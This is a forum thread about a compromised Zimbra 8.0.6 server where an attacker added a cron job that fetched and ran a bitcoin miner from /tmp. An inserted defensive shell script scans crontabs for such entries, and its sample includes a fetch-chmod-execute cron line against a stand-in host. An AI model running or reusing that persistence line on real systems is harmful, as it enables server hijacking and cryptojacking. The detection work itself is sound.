Thread: Zimbra server hacked

  1. #1

    Hi,
    I have a Zimbra 8.06 installation on a CentOS 6 server.
    Yesterday someone started 3 processes in the tmp folder as zimbra and added 2 jobs to the crontab.
    Could you help me understand how I can secure the server and how they did that?

    Thank you very much!

  2. #2
    phoenix, Zimbra Consultant & Moderator

    Quote Originally Posted by LeoB:
    I have a Zimbra 8.06 installation on a CentOS 6 server.
    Yesterday someone started 3 processes in the tmp folder as zimbra and added 2 jobs to the crontab.
    Could you help me understand how I can secure the server and how they did that?
    Not really as you've given no details on what they've actually done nor have you provided any details of your configuration (hardware or software) or the current security on your server. You could start by giving details on whether this server is behind a NAT router or directly on the internet or if this is a rootkit that's installed or what you've done to check and remove the offending processes.
    Regards

    Bill

  3. #3

    Thank you Bill for your quick reply..
    It's a virtual machine hosted by an Italian provider and it's directly connected to the internet with a public IP. It's protected by iptables through a shorewall configuration.. Only Zimbra is installed, on a CentOS 6.3 OS installed with the minimal option.
    I found a new entry in the cron of the user zimbra that every 6 hours downloads and launches a process in the /tmp/ folder. I didn't understand what the process does, but scanning it with VirusTotal, it says it's a bitcoin miner process. I also found in the same folder a cfg file with this entry stratum+tcp://ltc-eu.give-me-coins.com:3333 and a username and a password..
    Until now I just removed the cron entry, killed the processes and deleted them from the tmp folder, but I don't know how they added the cron entry.. Is there a log of the web interface to understand if they exploited the web in some way?

    thank you again!
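An added defender-side check, not from the thread or from Zimbra: a POSIX shell script that scans crontab text for the persistence shape described above (a job that fetches something into /tmp and runs it, a fetch-piped-to-shell chain, or a stratum pool URL). The crontab sample is constructed; the `crontab -l -u` form is assumed to be a Linux cron.

```shell
#!/bin/sh
# Constructed sample crontab (not from the thread): two normal-looking Zimbra
# jobs plus one entry in the shape the post describes: every 6 hours, fetch a
# file into /tmp and execute it.
SAMPLE_CRONTAB='# zimbra user crontab (constructed sample)
0 2 * * * /opt/zimbra/libexec/zmdailyreport
0 */6 * * * wget -q -O /tmp/x http://example.invalid/x && chmod +x /tmp/x && /tmp/x
*/5 * * * * /opt/zimbra/libexec/zmstatuslog'

# Read crontab text on stdin, print the lines that match any of these patterns:
#   1. a path under /tmp, /var/tmp or /dev/shm used as a command or argument
#   2. curl/wget output piped straight into sh or bash
#   3. a stratum+tcp:// mining-pool URL
# Comment and blank lines are skipped so a commented-out URL does not alert.
scan_crontab() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' | \
    grep -E -e '(^|[[:space:]&;|])/(tmp|var/tmp|dev/shm)/' \
            -e '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' \
            -e 'stratum[+]tcp://'
}

# Number of suspicious lines in the crontab text passed as $1 (always "0"
# or more; never fails, so callers can alert on a non-zero value).
count_suspicious() {
    printf '%s\n' "$1" | scan_crontab | wc -l | tr -d ' '
}

# Live-host audit (needs root): every user's crontab plus /etc/cron.d, with
# each hit prefixed by its owner. Not called by default.
audit_all_crontabs() {
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -l -u "$u" 2>/dev/null | scan_crontab | sed "s/^/$u: /"
    done
    cat /etc/cron.d/* 2>/dev/null | scan_crontab | sed 's|^|/etc/cron.d: |'
}

# Demo on the constructed sample: prints only the wget-to-/tmp line.
printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
```

Run `audit_all_crontabs` as root on the affected host to cover every account, not just zimbra; a match is a starting point for review, not proof of compromise on its own.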

  4. #4
    phoenix, Zimbra Consultant & Moderator

    Are you certain that you have ZCS 8.0.6 installed? Post the output of the following command:

    Code:
    zmcontrol -v

    This vulnerability was fixed in ZCS 8.0.6; are you sure this hack happened recently? Is this the only version of ZCS you've installed, and was it a new install or an upgrade?
    Regards

    Bill

  5. #5

    Yes, I'm sure it's 8.06. This is the output of the command you said:

    Code:
    Release 8.0.6_GA_5922.RHEL6_64_20131203103705 RHEL6_64 FOSS edition

    I also checked the creation date of the files and they are from 24 Jan 23.30 to 25 Jan at 7.56 am..

    Is there a log file where I can see what happened on that time?

  6. #6

    Sorry, I forgot to say it's an upgrade from a 7 version (I don't remember exactly which version), but for sure one of the bugged versions.
